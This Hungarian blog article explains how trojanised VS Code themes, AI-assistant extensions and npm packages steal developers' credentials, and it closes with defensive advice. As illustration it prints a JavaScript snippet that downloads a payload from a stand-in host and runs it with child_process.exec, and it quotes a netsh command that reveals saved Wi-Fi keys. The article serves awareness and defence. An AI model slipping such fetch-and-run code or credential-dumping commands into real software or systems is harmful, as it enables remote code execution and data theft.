Te ismered azt az érzést, amikor egy új VS Code témát vagy npm csomagot telepítesz, és azt várod, hogy végre gördülékenyebb legyen a munkád? Én is így vagyok vele. Hiszen az első szabály a fejlesztők között: bízunk az eszközeinkben. Amikor rányomsz az „Install” gombra, nem arra számítasz, hogy egy trójai faló lopakodik be a gépedre. Csak jobb szintaxiskiemelést, kényelmesebb munkakörnyezetet szeretnél.
De mostanában valami egészen más történik. Egy új hullám söpör végig a fejlesztői ökoszisztémán – és ez nem csak egy bugos kód vagy idegesítő reklámprogram. Ez egy összehangolt, precíziós támadás, amely a VS Code, npm, Go és Rust környezeteket célozza meg. A Check Point, Phylum és más biztonsági cégek kutatásai szerint ezek az úgynevezett „InfoStealerek” – információlopók – olyan bővítmények mögé bújnak, mint például a „Bitcoin Black” sötét téma vagy az „AI asszisztensnek” álcázott „Codo AI” és „Chengdu AI”.
Miért pont most? Miért pont te?
Ha eddig azt hitted, hogy a supply chain támadások csak nagyvállalatokat vagy állami szerveket érintenek (gondolj csak a SolarWinds botrányra), akkor most kapaszkodj meg: ez már személyes ügy. Ezek a támadások nem egy távoli szervert céloznak meg, hanem a te gépedet, ahol dolgozol. És ami még ijesztőbb: gyakran átugorják a vállalati tűzfalakat is, mert olyan protokollokon keresztül érkeznek, amiket te magad is megbízhatónak tartasz.
A „Bitcoin Black” például egy kriptósoknak szánt menő sötét téma volt, amit több ezer fejlesztő töltött le. A „Codo AI” pedig az AI-forradalom hullámát lovagolta meg – de valójában nem segített kódolni, hanem egy DLL-alapú infolopót telepített csendben.
A legdurvább? Működött. Mivel ezek az eszközök közvetlenül az IDE-dben futnak, hozzáférnek mindenhez: fájljaidhoz, környezeti változóidhoz (ahol például AWS kulcsaidat tárolod), sőt parancsokat is futtathatnak a háttérben.
„A támadók már nem csak betörnek az ajtón – ők azok a bútorok, amiket beviszel a lakásba.”
Mélyebbre ásva: hogyan működik ez az egész?
Elképzeled, hogy egy egyszerű témának tűnő bővítmény hogyan tudja ellopni a Wi-Fi jelszavadat? A válasz meglepően összetett és rávilágít arra, mennyire kifinomultak ezek a támadások.
1. Az „Imposter” mechanizmus – amikor hamis barátként lépnek be
A támadók első lépése mindig valamilyen social engineering, vagyis emberi megtévesztés. Két fő módszerrel dolgoznak:
- Typosquatting: Olyan névvel jelennek meg, ami nagyon hasonlít egy népszerű csomagra vagy bővítményre – például „prettier-vscode-plus”, ami elsőre legit verziónak tűnik, de valójában malware-t rejt.
- Trend Jacking: Megcélozzák az aktuális divathullámokat – kriptovalutás témák („Bitcoin Black”) vagy AI-asszisztensek („Codo AI”).
Ezekhez hamis „Verified” jelvényt ragasztanak (ami csak egy PNG kép), szépen megírják a README-t és mesterségesen feltornásszák a letöltésszámot botok segítségével. Így sok fejlesztő azt hiszi: „Ez tuti megbízható!” Pedig nem az.
2. A károkozó kód beszivárgása – DLL-ek és parancsok
Bár egy téma alapvetően csak színkódokat tartalmazó JSON fájl lenne, ezek a bővítmények rejtett JavaScript fájlokat is tartalmaznak. Amikor aktiválod őket vagy elindul a VS Code, ezek futnak:
- Kiszúrják magukat egy parancsvezérlő szerverrel (C2), amely gyakran kompromittált domainen vagy olcsó VPS-en fut.
- Letöltenek egy másodlagos payloadot – általában egy PE vagy DLL fájlt (például OctoRAT malware).
- Ezt elindítják úgy, hogy ne keltsenek gyanút (például ideiglenes mappába mentik).
Egy egyszerű példa arra, milyen könnyen nézhet ki ez a kód:
// Úgy néz ki mint egy telemetria hívás
const telemetry = require('./telemetry-utils');
function activate(context) {
// legitim téma aktiválás...
const u = "https://cdn-stats-track.com/update/v2/payload";
telemetry.checkUpdate(u).then(payload => {
require('child_process').exec(payload);
});
}
3. Az adatlopás: Wi-Fi jelszavaktól egészen képernyőkép készítésig
A malware nem áll meg az IDE-nél:
- Wi-Fi jelszavak: Windows alatt például lefuttatja a
netsh wlan show profile name="[SSID]" key=clearparancsot, így simán megszerzi a hálózatod kulcsait. - Böngészős sütik és jelszavak: Megkeresi Chrome profilodat és ellopja az SQLite adatbázisokat – így akár kétfaktoros hitelesítés nélkül is beléphetnek helyetted.
- Képernyőkép készítés: Windows API-k segítségével lefényképezi az aktív asztalt – ahol lehetnek érzékeny adatok (Postman tokenek, jelszókezelők).
- Klipbord figyelése: Ha éppen kriptotárca cím vagy API kulcs van vágólapon, azt ellopja vagy lecseréli.
4. A fertőzés matematikája: miért nő ilyen gyorsan ez a veszély?
A fertőzés valószínűsége nő azokkal az ellenőrizetlen csomagokkal, amiket telepítesz. Ha mondjuk 50 bővítményt használsz és ezer npm csomagot tartalmaz a projekted node_modules mappája, akkor még ha minden csomagnál csak minimális is az esély (R) arra, hogy rosszindulatú kód legyen benne, összességében majdnem biztosan kapsz valamit idővel.
Ezt így lehet leírni képlettel:
P(I) = 1 – (1 – R)Nd
Ahol P(I) a fertőzés valószínűsége, Nd pedig az ellenőrizetlen függőségek száma.
Történelmi visszapillantó: nem ma kezdődött ez
Emlékszel még az event-stream botrányra 2018-ból? Egy népszerű npm csomag karbantartója kiégés miatt átadta másnak a projektet – aki később titokban rosszindulatú kódot csempészett bele. Ez konkrétan bitcoin tárcák privát kulcsait lopta el.
A SolarWinds eset 2020-ban pedig megmutatta: ha sikerül megmérgezni egy build szervert (a forráskód gyártási folyamatát), akkor milliókhoz jut el a fertőzés.
Idén pedig láthattuk az XZ Utils backdoort, ahol éveken át építették ki a bizalmat mielőtt beillesztettek egy hátsó ajtót egy alap Linux könyvtárba.
A VS Code támadások ehhez képest olyanok mint egy gyorséttermi menü: gyorsan terjednek és könnyen hozzáférhetőek.
A „Lazarus csoport” új célpontjai: fejlesztők helyett bankrablók?
A híres-hírhedt állami támogatású hackercsoportok már nem bankokat törnek fel közvetlenül – hanem minket céloznak meg. Miért? Mert mi tartjuk kezünkben azoknak az online rendszereknek a kulcsait (AWS kulcsok, API-k). Ők tudják jól: ha minket feltörnek, onnan már minden nyitva áll előttük.
Milyen gazdasági okai vannak ennek?
Egy célzott adathalász kampány banki alkalmazott ellen rengeteg időt és pénzt emészt fel. Ezzel szemben egy hamis AI asszisztens bővítmény feltöltése gyakorlatilag nulla költségű. Ha ebből csak 5 ezer fejlesztő telepíti is… akkor abból akár több száz vállalati kulcs kerülhet ki!
Egyetlen érvényes AWS root kulcs akár 5-50 ezer dollárt érhet feketepiacon attól függően, milyen jogosultságai vannak. Ez hatalmas üzlet azoknak, akik hozzáférést árulnak tovább vagy zsarolóvírust telepítenek vele.
Mire számíthatunk 2026-ban?
- Búcsú az „azonnali publikálástól”: A Microsoft és GitHub valószínűleg bevezeti majd az App Store-szerű emberi ellenőrzést is. Nem lesz elég csak feltölteni valamit; komolyabb hitelesítés kell majd.
- Bővítmények sandboxban: A jövő VS Code-ja elképzelhetően WASM sandboxban futtatja majd őket alapból – így nem férnek hozzá automatikusan fájlokhoz vagy hálózathoz. Engedélyt kell majd kérniük minden érzékeny művelethez.
- Belsős engedélyezési listák: Vállalatok belső piactereket hoznak létre csak jóváhagyott bővítményekkel – vége lesz annak, hogy bárki bármit telepíthet.
Mire figyelj most? Ne várj senkire!
- Takarítsd ki az IDE-det: Nézd át rendszeresen az extension listádat! Amit nem használsz napi szinten, azt töröld!
- Ellenőrizd ki adta ki: Nézd meg ki áll mögötte! Van weboldala? GitHub repo? Ha gyanúsan új vagy általános névvel találkozol, inkább kerüld el!
- Használj biztonsági eszközöket: Socket vagy Snyk már IDE-k bővítményeit is vizsgálják – használd őket!
- Korlátozd hálózati kapcsolatokat: Mac-en például Little Snitch segítségével figyelheted hova kapcsolódik VS Code-od. Ha furcsa helyre megy adatforgalom (pl. egzotikus ország szervereire), tiltsd le!
Zárszó: Az IDE-d már nem menedék – harctér lett
A „Trójai téma” korszak beköszöntött. Amit eddig eszközödnek hittél arra szolgált munkád hatékonyabbá tételéhez, most potenciális behatolási ponttá vált. Érdemes tehát komolyan venni ezt a fenyegetést és tudatosan védeni magad és céged értékeit.
Kódolj okosan – mert ma már nem csak hibákat kell elkerülnöd; ellenségeid is vannak odabent.
Forrás: https://trendytechtribe.com/tech/trojan-themes-vscode-malware






